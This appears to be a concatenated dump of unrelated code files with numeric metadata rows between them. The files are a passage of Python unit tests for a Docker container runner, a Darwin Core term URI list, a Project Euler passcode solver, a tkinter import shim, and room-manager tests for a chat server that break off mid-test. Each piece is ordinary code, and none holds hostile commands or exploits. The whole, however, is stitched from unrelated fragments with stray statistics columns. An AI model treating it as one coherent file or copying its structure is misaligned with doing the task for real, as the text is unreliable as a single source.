        self._prime_mocks(resource_filename_mock, check_output_mock, popen_mock,
                          grp_getgrnam_mock, os_getuid_mock)
        runner.run(['pwd'], FQDN_IMAGE, interactive=True)
        popen_mock.assert_called_once_with(
            self._expected_command('pwd', get_default_net(), interactive=True))

    @mock.patch('os.path.exists', mock.MagicMock(autospec=True, return_value=True))
    @mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
    @mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
    @mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
    @mock.patch('os.getuid', autospec=True)
    @mock.patch('grp.getgrnam', autospec=True,)
    @mock.patch('subprocess.Popen', autospec=False)
    @mock.patch('subprocess.check_output', autospec=False)
    @mock.patch('pkg_resources.resource_filename', autospec=False)
    def test_run_complex_command_nested(self, resource_filename_mock, check_output_mock, popen_mock, grp_getgrnam_mock, os_getuid_mock):
        """A multi-word command is space-joined into one container argument."""
        self._prime_mocks(resource_filename_mock, check_output_mock, popen_mock,
                          grp_getgrnam_mock, os_getuid_mock)
        command = ['ls', '-l']
        runner.run(command, FQDN_IMAGE)
        popen_mock.assert_called_once_with(
            self._expected_command(' '.join(command), get_default_net()))

    @mock.patch('os.path.exists', mock.MagicMock(autospec=True, return_value=True))
    @mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
    @mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
    @mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
    @mock.patch('os.getuid', autospec=True)
    @mock.patch('grp.getgrnam', autospec=True)
    @mock.patch('subprocess.Popen', autospec=False)
    @mock.patch('subprocess.check_output', autospec=False)
    @mock.patch('pkg_resources.resource_filename', autospec=False)
    def test_run_complex_command_nested_with_env(self, resource_filename_mock, check_output_mock, popen_mock, grp_getgrnam_mock, os_getuid_mock):
        """name= adds '--name <name>' right after 'docker run'."""
        self._prime_mocks(resource_filename_mock, check_output_mock, popen_mock,
                          grp_getgrnam_mock, os_getuid_mock)
        command = ['ls', '-l']
        runner.run(command, FQDN_IMAGE, ENV, name="test")
        popen_mock.assert_called_once_with(
            self._expected_command(' '.join(command), get_default_net(),
                                   name="test", env=ENV))

    @mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
    @mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
    @mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
    @mock.patch('skipper.runner.utils.create_path_and_add_data', autospec=True)
    @mock.patch('os.path.exists', autospec=True)
    @mock.patch('os.getuid', autospec=True)
    @mock.patch('grp.getgrnam', autospec=True)
    @mock.patch('subprocess.Popen', autospec=False)
    @mock.patch('subprocess.check_output', autospec=False)
    @mock.patch('pkg_resources.resource_filename', autospec=False)
    def test_run_complex_command_nested_with_special_case_verification(self, resource_filename_mock, check_output_mock,
                                                                       popen_mock, grp_getgrnam_mock, os_getuid_mock,
                                                                       path_exists_mock, create_path_and_add_data_mock):
        """Missing host paths are created and dropped from the mounts.

        With os.path.exists() returning False, runner.run() must create
        the .docker/config.json and .gitconfig stubs and omit the
        /etc/docker and /var/lib/osmosis mounts.
        """
        path_exists_mock.return_value = False
        self._prime_mocks(resource_filename_mock, check_output_mock, popen_mock,
                          grp_getgrnam_mock, os_getuid_mock)
        command = ['ls', '-l']
        runner.run(command, FQDN_IMAGE, ENV, name="test", volumes=[])
        # Only the mounts that survive when the host paths do not exist,
        # expected raw (un-mapped) exactly as the original test asserted.
        surviving_volumes = [
            '%(homedir)s/.netrc:%(homedir)s/.netrc:ro' % dict(homedir=HOME_DIR),
            '%(homedir)s/.gitconfig:%(homedir)s/.gitconfig:ro' % dict(homedir=HOME_DIR),
            '%(homedir)s/.docker/config.json:%(homedir)s/.docker/config.json:ro' % dict(homedir=HOME_DIR),
            '%(workdir)s:%(workdir)s:rw' % dict(workdir=WORKDIR),
            '/var/run/docker.sock:/var/run/docker.sock:rw',
            'entrypoint.sh:/opt/skipper/skipper-entrypoint.sh',
        ]
        expected_nested_command = self._expected_command(
            ' '.join(command), get_default_net(), name="test", env=ENV,
            volume_flags=self._volume_flags(surviving_volumes, apply_mapping=False))
        calls = [mock.call(full_path="%(homedir)s/.docker/config.json" % dict(homedir=HOME_DIR),
                           data="{}", is_file=True),
                 mock.call(full_path="/home/adir/.gitconfig", data="", is_file=True)]
        create_path_and_add_data_mock.assert_has_calls(calls, any_order=True)
        popen_mock.assert_called_once_with(expected_nested_command)

    def test_handle_volumes_bind_mount_with_bad_volume_mount(self):
        """A malformed volume spec raises ValueError."""
        docker_cmd = ['docker', 'run']
        volumes = ['bad volume mount']
        with self.assertRaises(ValueError):
            runner.handle_volumes_bind_mount(docker_cmd, HOME_DIR, volumes, WORKDIR)
| 53.880952
| 145
| 0.621152
| 3,325
| 27,156
| 4.81594
| 0.05203
| 0.065946
| 0.056954
| 0.059452
| 0.926247
| 0.915881
| 0.908324
| 0.907263
| 0.904265
| 0.895835
| 0
| 0.005383
| 0.220099
| 27,156
| 503
| 146
| 53.988072
| 0.750696
| 0
| 0
| 0.805439
| 0
| 0.018828
| 0.263109
| 0.165562
| 0
| 0
| 0
| 0
| 0.027197
| 1
| 0.029289
| false
| 0.018828
| 0.014644
| 0
| 0.054393
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f6241736e9a9091965f110ad19a07fc9fa6bb9e7
| 8,093
|
py
|
Python
|
dwca/darwincore/terms.py
|
neilh-cogapp/python-dwca-reader
|
04120b80f33d632ac78284b57c153c4a5f574941
|
[
"BSD-3-Clause"
] | 30
|
2015-01-13T22:06:37.000Z
|
2022-02-06T18:45:45.000Z
|
dwca/darwincore/terms.py
|
neilh-cogapp/python-dwca-reader
|
04120b80f33d632ac78284b57c153c4a5f574941
|
[
"BSD-3-Clause"
] | 63
|
2015-01-12T14:16:55.000Z
|
2021-08-13T10:48:30.000Z
|
dwca/darwincore/terms.py
|
neilh-cogapp/python-dwca-reader
|
04120b80f33d632ac78284b57c153c4a5f574941
|
[
"BSD-3-Clause"
] | 22
|
2015-08-04T16:33:04.000Z
|
2021-05-25T20:26:07.000Z
|
TERMS = ['http://rs.tdwg.org/dwc/terms/occurrenceDetails', 'http://rs.tdwg.org/dwc/terms/highestBiostratigraphicZone', 'http://rs.tdwg.org/dwc/terms/associatedTaxa', 'http://rs.tdwg.org/dwc/terms/latestEpochOrHighestSeries', 'http://rs.tdwg.org/dwc/terms/informationWithheld', 'http://rs.tdwg.org/dwc/terms/minimumDistanceAboveSurfaceInMeters', 'http://rs.tdwg.org/dwc/terms/behavior', 'http://rs.tdwg.org/dwc/terms/verbatimLongitude', 'http://rs.tdwg.org/dwc/terms/countryCode', 'http://rs.tdwg.org/dwc/terms/associatedSequences', 'http://rs.tdwg.org/dwc/terms/habitat', 'http://rs.tdwg.org/dwc/terms/islandGroup', 'http://rs.tdwg.org/dwc/terms/nomenclaturalCode', 'http://purl.org/dc/terms/license', 'http://rs.tdwg.org/dwc/terms/earliestEonOrLowestEonothem', 'http://rs.tdwg.org/dwc/terms/year', 'http://rs.tdwg.org/dwc/terms/taxonID', 'http://rs.tdwg.org/dwc/terms/continent', 'http://rs.tdwg.org/dwc/terms/nameAccordingTo', 'http://rs.tdwg.org/dwc/terms/latestEraOrHighestErathem', 'http://rs.tdwg.org/dwc/terms/eventID', 'http://rs.tdwg.org/dwc/terms/nameAccordingToID', 'http://rs.tdwg.org/dwc/terms/decimalLongitude', 'http://rs.tdwg.org/dwc/terms/sampleSizeValue', 'http://rs.tdwg.org/dwc/terms/identifiedBy', 'http://rs.tdwg.org/dwc/terms/latestEonOrHighestEonothem', 'http://rs.tdwg.org/dwc/terms/catalogNumber', 'http://rs.tdwg.org/dwc/terms/eventRemarks', 'http://rs.tdwg.org/dwc/terms/taxonRank', 'http://rs.tdwg.org/dwc/terms/verbatimDepth', 'http://rs.tdwg.org/dwc/terms/originalNameUsageID', 'http://purl.org/dc/terms/rightsHolder', 'http://rs.tdwg.org/dwc/terms/lowestBiostratigraphicZone', 'http://purl.org/dc/terms/bibliographicCitation', 'http://rs.tdwg.org/dwc/terms/island', 'http://rs.tdwg.org/dwc/terms/associatedMedia', 'http://rs.tdwg.org/dwc/terms/group', 'http://rs.tdwg.org/dwc/terms/endDayOfYear', 'http://rs.tdwg.org/dwc/terms/individualCount', 'http://rs.tdwg.org/dwc/terms/occurrenceRemarks', 'http://rs.tdwg.org/dwc/terms/disposition', 
'http://rs.tdwg.org/dwc/terms/collectionID', 'http://rs.tdwg.org/dwc/terms/sampleSizeUnit', 'http://rs.tdwg.org/dwc/terms/earliestPeriodOrLowestSystem', 'http://rs.tdwg.org/dwc/terms/county', 'http://rs.tdwg.org/dwc/terms/eventDate', 'http://rs.tdwg.org/dwc/terms/earliestEpochOrLowestSeries', 'http://rs.tdwg.org/dwc/terms/formation', 'http://rs.tdwg.org/dwc/terms/Taxon', 'http://purl.org/dc/terms/references', 'http://purl.org/dc/terms/language', 'http://rs.tdwg.org/dwc/terms/decimalLatitude', 'http://rs.tdwg.org/dwc/terms/startDayOfYear', 'http://rs.tdwg.org/dwc/terms/fieldNotes', 'http://rs.tdwg.org/dwc/terms/municipality', 'http://rs.tdwg.org/dwc/terms/namePublishedInYear', 'http://rs.tdwg.org/dwc/terms/associatedReferences', 'http://rs.tdwg.org/dwc/terms/georeferenceVerificationStatus', 'http://rs.tdwg.org/dwc/terms/datasetName', 'http://rs.tdwg.org/dwc/terms/locality', 'http://rs.tdwg.org/dwc/terms/identificationID', 'http://purl.org/dc/terms/type', 'http://rs.tdwg.org/dwc/terms/scientificNameID', 'http://rs.tdwg.org/dwc/terms/verbatimLatitude', 'http://rs.tdwg.org/dwc/terms/occurrenceID', 'http://rs.tdwg.org/dwc/terms/verbatimTaxonRank', 'http://rs.tdwg.org/dwc/terms/verbatimSRS', 'http://rs.tdwg.org/dwc/terms/order', 'http://rs.tdwg.org/dwc/terms/georeferenceProtocol', 'http://rs.tdwg.org/dwc/terms/locationAccordingTo', 'http://rs.tdwg.org/dwc/terms/originalNameUsage', 'http://rs.tdwg.org/dwc/terms/geodeticDatum', 'http://rs.tdwg.org/dwc/terms/Occurrence', 'http://rs.tdwg.org/dwc/terms/establishmentMeans', 'http://rs.tdwg.org/dwc/terms/parentNameUsage', 'http://rs.tdwg.org/dwc/terms/taxonRemarks', 'http://rs.tdwg.org/dwc/terms/footprintSRS', 'http://rs.tdwg.org/dwc/terms/collectionCode', 'http://rs.tdwg.org/dwc/terms/class', 'http://rs.tdwg.org/dwc/terms/family', 'http://rs.tdwg.org/dwc/terms/footprintWKT', 'http://rs.tdwg.org/dwc/terms/georeferenceRemarks', 'http://rs.tdwg.org/dwc/terms/lithostratigraphicTerms', 
'http://rs.tdwg.org/dwc/terms/geologicalContextID', 'http://rs.tdwg.org/dwc/terms/dateIdentified', 'http://rs.tdwg.org/dwc/terms/higherGeographyID', 'http://rs.tdwg.org/dwc/terms/pointRadiusSpatialFit', 'http://rs.tdwg.org/dwc/terms/dynamicProperties', 'http://rs.tdwg.org/dwc/terms/verbatimLocality', 'http://purl.org/dc/terms/modified', 'http://rs.tdwg.org/dwc/terms/month', 'http://rs.tdwg.org/dwc/terms/earliestEraOrLowestErathem', 'http://rs.tdwg.org/dwc/terms/samplingProtocol', 'http://rs.tdwg.org/dwc/terms/infraspecificEpithet', 'http://rs.tdwg.org/dwc/terms/footprintSpatialFit', 'http://rs.tdwg.org/dwc/terms/namePublishedIn', 'http://rs.tdwg.org/dwc/terms/georeferenceSources', 'http://rs.tdwg.org/dwc/terms/identificationRemarks', 'http://rs.tdwg.org/dwc/terms/taxonConceptID', 'http://purl.org/dc/terms/accessRights', 'http://rs.tdwg.org/dwc/terms/lifeStage', 'http://rs.tdwg.org/dwc/terms/acceptedNameUsage', 'http://rs.tdwg.org/dwc/terms/verbatimEventDate', 'http://rs.tdwg.org/dwc/terms/typeStatus', 'http://rs.tdwg.org/dwc/terms/maximumDepthInMeters', 'http://rs.tdwg.org/dwc/terms/preparations', 'http://rs.tdwg.org/dwc/terms/georeferencedDate', 'http://rs.tdwg.org/dwc/terms/institutionID', 'http://rs.tdwg.org/dwc/terms/verbatimCoordinates', 'http://rs.tdwg.org/dwc/terms/vernacularName', 'http://rs.tdwg.org/dwc/terms/bed', 'http://rs.tdwg.org/dwc/terms/materialSampleID', 'http://rs.tdwg.org/dwc/terms/maximumElevationInMeters', 'http://purl.org/dc/terms/rights', 'http://rs.tdwg.org/dwc/terms/scientificName', 'http://rs.tdwg.org/dwc/terms/identificationReferences', 'http://rs.tdwg.org/dwc/terms/day', 'http://rs.tdwg.org/dwc/terms/fieldNumber', 'http://rs.tdwg.org/dwc/terms/parentNameUsageID', 'http://rs.tdwg.org/dwc/terms/acceptedNameUsageID', 'http://rs.tdwg.org/dwc/terms/identificationQualifier', 'http://rs.tdwg.org/dwc/terms/dataGeneralizations', 'http://rs.tdwg.org/dwc/terms/sex', 'http://rs.tdwg.org/dwc/terms/previousIdentifications', 
'http://rs.tdwg.org/dwc/terms/georeferencedBy', 'http://rs.tdwg.org/dwc/terms/latestPeriodOrHighestSystem', 'http://rs.tdwg.org/dwc/terms/kingdom', 'http://rs.tdwg.org/dwc/terms/basisOfRecord', 'http://rs.tdwg.org/dwc/terms/institutionCode', 'http://rs.tdwg.org/dwc/terms/verbatimCoordinateSystem', 'http://rs.tdwg.org/dwc/terms/waterBody', 'http://rs.tdwg.org/dwc/terms/phylum', 'http://rs.tdwg.org/dwc/terms/ownerInstitutionCode', 'http://rs.tdwg.org/dwc/terms/latestAgeOrHighestStage', 'http://rs.tdwg.org/dwc/terms/occurrenceStatus', 'http://rs.tdwg.org/dwc/terms/higherClassification', 'http://purl.org/dc/terms/source', 'http://rs.tdwg.org/dwc/terms/recordedBy', 'http://rs.tdwg.org/dwc/terms/datasetID', 'http://rs.tdwg.org/dwc/terms/minimumElevationInMeters', 'http://rs.tdwg.org/dwc/terms/individualID', 'http://rs.tdwg.org/dwc/terms/samplingEffort', 'http://rs.tdwg.org/dwc/terms/Event', 'http://rs.tdwg.org/dwc/terms/member', 'http://rs.tdwg.org/dwc/terms/scientificNameAuthorship', 'http://rs.tdwg.org/dwc/terms/locationID', 'http://rs.tdwg.org/dwc/terms/higherGeography', 'http://rs.tdwg.org/dwc/terms/genus', 'http://rs.tdwg.org/dwc/terms/associatedOccurrences', 'http://rs.tdwg.org/dwc/terms/verbatimElevation', 'http://rs.tdwg.org/dwc/terms/maximumDistanceAboveSurfaceInMeters', 'http://rs.tdwg.org/dwc/terms/minimumDepthInMeters', 'http://rs.tdwg.org/dwc/terms/stateProvince', 'http://rs.tdwg.org/dwc/terms/nomenclaturalStatus', 'http://rs.tdwg.org/dwc/terms/taxonomicStatus', 'http://rs.tdwg.org/dwc/terms/specificEpithet', 'http://rs.tdwg.org/dwc/terms/parentEventID', 'http://rs.tdwg.org/dwc/terms/subgenus', 'http://rs.tdwg.org/dwc/terms/coordinatePrecision', 'http://rs.tdwg.org/dwc/terms/eventTime', 'http://rs.tdwg.org/dwc/terms/country', 'http://rs.tdwg.org/dwc/terms/coordinateUncertaintyInMeters', 'http://rs.tdwg.org/dwc/terms/identificationVerificationStatus', 'http://rs.tdwg.org/dwc/terms/otherCatalogNumbers', 'http://rs.tdwg.org/dwc/terms/earliestAgeOrLowestStage', 
'http://rs.tdwg.org/dwc/terms/recordNumber', 'http://rs.tdwg.org/dwc/terms/reproductiveCondition', 'http://rs.tdwg.org/dwc/terms/locationRemarks', 'http://rs.tdwg.org/dwc/terms/namePublishedInID']
| 4,046.5
| 8,092
| 0.750154
| 1,174
| 8,093
| 5.17121
| 0.150767
| 0.157141
| 0.261901
| 0.340471
| 0.579641
| 0.549992
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021129
| 8,093
| 1
| 8,093
| 8,093
| 0.766347
| 0
| 0
| 0
| 0
| 0
| 0.915359
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
f63916f5f63866ab9b61ea738d5d02526728e7a1
| 4,208
|
py
|
Python
|
Problem 079 - Passcode Derivation.py
|
Deviloxide/Project-Euler
|
bc26bdd6d1efa90e5e7523e77764a32104534ef7
|
[
"MIT"
] | null | null | null |
Problem 079 - Passcode Derivation.py
|
Deviloxide/Project-Euler
|
bc26bdd6d1efa90e5e7523e77764a32104534ef7
|
[
"MIT"
] | null | null | null |
Problem 079 - Passcode Derivation.py
|
Deviloxide/Project-Euler
|
bc26bdd6d1efa90e5e7523e77764a32104534ef7
|
[
"MIT"
] | null | null | null |
def passcode_derivation(file):
    """Project Euler 79: derive a digit ordering for the passcode.

    Each whitespace-separated token in ``file`` is one successful login
    attempt (e.g. ``"317"``) whose digits appear in passcode order.  For
    every digit 0-9 we collect the set of distinct digits known to precede
    it, then return the digits 0-9 (as ints) sorted by the number of
    distinct predecessors.  The sort is stable, so digits with equal
    predecessor counts keep numeric order (matching the original version).

    :param file: path to the keylog file of digit-string attempts
    :return: list of the ints 0-9, ordered by predecessor count
    """
    # Context manager replaces the original unclosed file handle.
    with open(file, "r") as text_file:
        attempts = text_file.read().split()
    # predecessors['d'] = distinct digits seen before 'd' in any attempt.
    # One dict replaces the original's ten copy-pasted b0..b9 branches.
    predecessors = {str(digit): set() for digit in range(10)}
    for attempt in attempts:
        # Every digit is preceded by all digits to its left.  This also
        # fixes the original bug where `if line[1] not in num_list` tested
        # the wrong element and could skip recording a predecessor, and it
        # generalizes beyond exactly-three-digit attempts.
        for pos in range(1, len(attempt)):
            predecessors[attempt[pos]].update(attempt[:pos])
    return sorted(range(10), key=lambda digit: len(predecessors[str(digit)]))


if __name__ == "__main__":
    # Guarded so importing this module does not require the data file.
    print(passcode_derivation(r"Additional Files\p079_keylog.txt"))
| 28.053333
| 63
| 0.456749
| 591
| 4,208
| 3.067682
| 0.094755
| 0.27027
| 0.132377
| 0.198566
| 0.823497
| 0.823497
| 0.823497
| 0.823497
| 0.823497
| 0.823497
| 0
| 0.052345
| 0.43251
| 4,208
| 149
| 64
| 28.241611
| 0.706868
| 0
| 0
| 0.655738
| 0
| 0
| 0.010594
| 0.005174
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008197
| false
| 0.016393
| 0
| 0
| 0.016393
| 0.008197
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
140a307831c5f4fa4a38f9a49a9405a449f927f7
| 99
|
py
|
Python
|
memtkinter/scrolledtext.py
|
JamesGKent/memtkinter
|
c4e178b33f24e609c812b20bddfff7448782a192
|
[
"MIT"
] | null | null | null |
memtkinter/scrolledtext.py
|
JamesGKent/memtkinter
|
c4e178b33f24e609c812b20bddfff7448782a192
|
[
"MIT"
] | 3
|
2018-06-04T09:32:20.000Z
|
2018-06-07T15:27:56.000Z
|
memtkinter/scrolledtext.py
|
JamesGKent/memtkinter
|
c4e178b33f24e609c812b20bddfff7448782a192
|
[
"MIT"
] | null | null | null |
# Compatibility shim: re-export ScrolledText from the Python 3 stdlib
# location, falling back to the legacy Python 2 module path.  The star
# import is deliberate — this module's whole purpose is to re-export the
# underlying module's public names under one stable import path.
try:
    from tkinter.scrolledtext import *  # Python 3
except ImportError:
    from Tkinter.ScrolledText import *  # Python 2 fallback
| 24.75
| 36
| 0.787879
| 11
| 99
| 7.090909
| 0.636364
| 0.282051
| 0.589744
| 0.74359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 99
| 4
| 37
| 24.75
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1aed2562a4074d14712b800caff0fa411f442acb
| 10,192
|
py
|
Python
|
test/db/test_room_manager.py
|
thenetcircle/dino
|
1047c3458e91a1b4189e9f48f1393b3a68a935b3
|
[
"Apache-2.0"
] | 150
|
2016-10-05T11:09:36.000Z
|
2022-03-06T16:24:41.000Z
|
test/db/test_room_manager.py
|
thenetcircle/dino
|
1047c3458e91a1b4189e9f48f1393b3a68a935b3
|
[
"Apache-2.0"
] | 27
|
2017-03-02T03:37:02.000Z
|
2022-02-10T04:59:54.000Z
|
test/db/test_room_manager.py
|
thenetcircle/dino
|
1047c3458e91a1b4189e9f48f1393b3a68a935b3
|
[
"Apache-2.0"
] | 21
|
2016-11-11T07:51:48.000Z
|
2020-04-26T21:38:33.000Z
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dino.db.manager.rooms import RoomManager
from dino.exceptions import NoSuchChannelException
from dino.exceptions import NoSuchRoomException
from uuid import uuid4 as uuid
from test.db import BaseDatabaseTest
__author__ = 'Oscar Eriksson <oscar.eriks@gmail.com>'
class RoomManagerTest(BaseDatabaseTest):
    """Integration tests for ``RoomManager`` on top of the redis test backend.

    Convention used by the manager under test (as exercised below): a
    ``None`` return value signals success, a non-``None`` value carries an
    error, and missing rooms raise ``NoSuchRoomException``.
    """

    # Last activity captured by the stubbed publisher (set by _publish).
    _act = None

    @staticmethod
    def _publish(activity: dict, external: bool=False) -> None:
        """Stub for ``env.publish``: record the activity instead of sending it."""
        RoomManagerTest._act = activity

    def setUp(self):
        self.set_up_env('redis')
        self.env.publish = RoomManagerTest._publish
        self._act = None
        self.env.db = self.db
        self.manager = RoomManager(self.env)

    def tearDown(self):
        # Flush redis and the cache so no state leaks between tests.
        self.db.redis.flushall()
        self.env.cache._flushall()

    def test_get_rooms_before_channel_creation(self):
        rooms = self.manager.get_rooms(BaseDatabaseTest.CHANNEL_ID)
        self.assertEqual(0, len(rooms))

    def test_get_rooms_before_room_creation(self):
        self._create_channel()
        rooms = self.manager.get_rooms(BaseDatabaseTest.CHANNEL_ID)
        self.assertEqual(0, len(rooms))

    def test_get_rooms_after_create(self):
        self._create_channel()
        self._create_room()
        rooms = self.manager.get_rooms(BaseDatabaseTest.CHANNEL_ID)
        self.assertEqual(1, len(rooms))
        self.assertEqual(BaseDatabaseTest.ROOM_ID, rooms[0]['uuid'])
        self.assertEqual(BaseDatabaseTest.ROOM_NAME, rooms[0]['name'])

    def test_create_room(self):
        self._create_channel()
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
        value = self.manager.create_room(
            BaseDatabaseTest.ROOM_NAME, BaseDatabaseTest.ROOM_ID,
            BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.USER_ID)
        self.assertIsNone(value)
        self.assertTrue(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))

    def test_create_room_empty_room_name(self):
        self._create_channel()
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
        value = self.manager.create_room(
            '', BaseDatabaseTest.ROOM_ID,
            BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.USER_ID)
        self.assertIsNotNone(value)
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))

    def test_create_room_empty_room_id(self):
        self._create_channel()
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
        value = self.manager.create_room(
            BaseDatabaseTest.ROOM_NAME, '',
            BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.USER_ID)
        self.assertIsNotNone(value)
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))

    def test_create_room_empty_channel_id(self):
        self._create_channel()
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
        value = self.manager.create_room(
            BaseDatabaseTest.ROOM_NAME, BaseDatabaseTest.ROOM_ID,
            '', BaseDatabaseTest.USER_ID)
        self.assertIsNotNone(value)
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))

    def test_create_room_empty_user_id(self):
        self._create_channel()
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
        value = self.manager.create_room(
            BaseDatabaseTest.ROOM_NAME, BaseDatabaseTest.ROOM_ID,
            BaseDatabaseTest.CHANNEL_ID, '')
        self.assertIsNotNone(value)
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))

    def test_remove_room(self):
        self._create_channel()
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
        self.manager.create_room(
            BaseDatabaseTest.ROOM_NAME, BaseDatabaseTest.ROOM_ID,
            BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.USER_ID)
        self.assertTrue(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
        self.manager.remove_room(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID)
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))

    def test_remove_room_twice(self):
        self._create_channel()
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
        self.manager.create_room(
            BaseDatabaseTest.ROOM_NAME, BaseDatabaseTest.ROOM_ID,
            BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.USER_ID)
        self.assertTrue(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
        self.manager.remove_room(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID)
        # The second removal must fail loudly, not silently succeed.
        self.assertRaises(
            NoSuchRoomException, self.manager.remove_room, BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID)
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))

    def test_remove_room_before_create_room(self):
        self._create_channel()
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
        self.assertRaises(
            NoSuchRoomException, self.manager.remove_room, BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID)
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))

    def test_remove_room_before_create_channel(self):
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))
        self.assertRaises(
            NoSuchRoomException, self.manager.remove_room, BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID)
        self.assertFalse(self.db.room_exists(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID))

    def test_remove_room_empty_room_id(self):
        self._create_channel()
        self.assertRaises(NoSuchRoomException, self.manager.remove_room, BaseDatabaseTest.CHANNEL_ID, '')

    def test_rename_room(self):
        self._create_channel()
        self._create_room()
        self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.db.get_room_name(BaseDatabaseTest.ROOM_ID))
        value = self.manager.rename(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID, 'new-name')
        self.assertIsNone(value)
        self.assertEqual('new-name', self.db.get_room_name(BaseDatabaseTest.ROOM_ID))

    def test_rename_room_already_exists(self):
        self._create_channel()
        self._create_room()
        self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.db.get_room_name(BaseDatabaseTest.ROOM_ID))
        value = self.manager.rename(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID, BaseDatabaseTest.ROOM_NAME)
        self.assertIsNotNone(value)
        self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.db.get_room_name(BaseDatabaseTest.ROOM_ID))

    def test_rename_room_no_such_room(self):
        self._create_channel()
        self._create_room()
